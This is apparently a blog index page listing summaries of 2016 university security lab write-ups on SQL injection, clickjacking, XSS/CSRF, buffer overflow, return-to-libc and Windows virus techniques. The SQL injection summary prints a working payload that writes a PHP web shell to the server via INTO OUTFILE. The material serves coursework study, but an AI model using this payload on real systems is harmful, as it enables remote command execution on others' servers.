2016年3月7日
web安全:sql 注入
摘要: sql注入获取webshell寻找sql注入页面,操作数据库的地方向网站写入sql语句' union select 1,2, '<?php system($_GET["cmd"]);?>' into outfile '/var/www/myzoo/cmd.php'发现mysql没有写入权限,于是在a 阅读全文
posted @ 2016-03-07 20:16 ailx10 阅读(263) 评论(0) 推荐(0) 编辑
web安全:click jacking
摘要: 点击劫持 click jacking通过iframe加载被攻击网站到黑客自己维护的网站通过z-index叠加和position定位,将2个网站的信息堆叠在一个立体投影面上,通过opacity设置透明度。诱导普通用户点击按钮。 防御:js防御:if (top.location != self.loca 阅读全文
posted @ 2016-03-07 20:14 ailx10 阅读(307) 评论(0) 推荐(0) 编辑
web安全:xss && csrf
摘要: 首先在user.php文件中去除黑名单的第一行标签,在白名单中添加<script>E1:csrf攻击zoobarcsrf:cross-site request forgery 跨站伪造请求普通用户登录myzoo网站后,在未退出的状态下,浏览了attack/csrf网站该网站伪造了一份myzoo网站的 阅读全文
posted @ 2016-03-07 20:13 ailx10 阅读(800) 评论(0) 推荐(0) 编辑
web安全:HTTPS
摘要: E1:搭建zoobar网站开启apache服务和mysql服务service apache2 startservice mysql start建立数据库和表mysql->create database myzoo;use myzoo;create table Person(PersonID int 阅读全文
posted @ 2016-03-07 20:08 ailx10 阅读(442) 评论(0) 推荐(0) 编辑
信息安全实验三:privilege-separation
摘要: title: privilege separation date: 2016 01 12 14:40:04 categories: tags: Exercise1 In order to gain deeper understanding of the internal architecture o 阅读全文
posted @ 2016-03-07 19:43 ailx10 阅读(410) 评论(0) 推荐(0) 编辑
信息安全实验四:information-security
摘要: title: authentication date: 2016 01 13 14:33:22 categories: information security tags: authentication Exercise1 There are many bugs and vulnerabilitie 阅读全文
posted @ 2016-03-07 19:43 ailx10 阅读(327) 评论(0) 推荐(0) 编辑
信息安全实验二:return-to-libc
摘要: title: return to libc date: 2016 01 11 17:40:30 categories: information security tags: return to libc Exercise1 The Ubuntu 12.04 OS you've been using 阅读全文
posted @ 2016-03-07 19:42 ailx10 阅读(718) 评论(0) 推荐(0) 编辑
信息安全实验一:buffer-overflow
摘要: title: buffer overflow date: 2016 01 10 14:17:17 categories: information security tags: buffer overflow Excrcise1 Now, you can write some code. Your j 阅读全文
posted @ 2016-03-07 19:41 ailx10 阅读(1249) 评论(0) 推荐(0) 编辑
病毒实验五
摘要: title: viruslab5 date: 2016 01 13 15:47:40 categories: virus tags: virus PE文件注入 part1 要求:附带程序将一个完整的PE文件(hellow.exe)读到内存中 并将其分解为PE头、节表、以及各个节。 试编写void O 阅读全文
posted @ 2016-03-07 19:35 ailx10 阅读(310) 评论(0) 推荐(0) 编辑
病毒实验四
摘要: title: viruslab4 date: 2016 01 06 15:05:28 categories: virus tags: virus 导入地址表挂钩 工具:vs2012 ollydbg part1 完成函数GetIAFromImportTable() 遍历当前进程test.exe模块的导 阅读全文
posted @ 2016-03-07 19:34 ailx10 阅读(199) 评论(0) 推荐(0) 编辑
病毒实验三
摘要: title: viruslab3 date: 2016 01 05 20:13:57 categories: virus tags: virus 进程注入 工具:vs2012 ollydbg part1 编写二进制代码 弹出MessageBox对话框 并测试运行之 要求:首先写汇编代码片段完成以下功 阅读全文
posted @ 2016-03-07 19:33 ailx10 阅读(926) 评论(0) 推荐(0) 编辑
病毒实验二
摘要: title: viruslab2 date: 2016 01 02 20:38:00 categories: virus tags: virus 工具:vs2012 ollydbg part1 本程序附带一个hello.exe程序 使用ollydbg调试该程序完成下列任务 列出hello.exe加载 阅读全文
posted @ 2016-03-07 19:32 ailx10 阅读(250) 评论(0) 推荐(0) 编辑
病毒实验一
摘要: title: viruslab1 date: 2015 12 30 20:18:39 categories: virus tags: virus 工具:vs2012 ollydbg part1 步骤1:编写内嵌汇编程序add.c 计算x+y 并调用printf()函数输出结果 步骤2:编译链接add 阅读全文
posted @ 2016-03-07 19:31 ailx10 阅读(339) 评论(0) 推荐(0) 编辑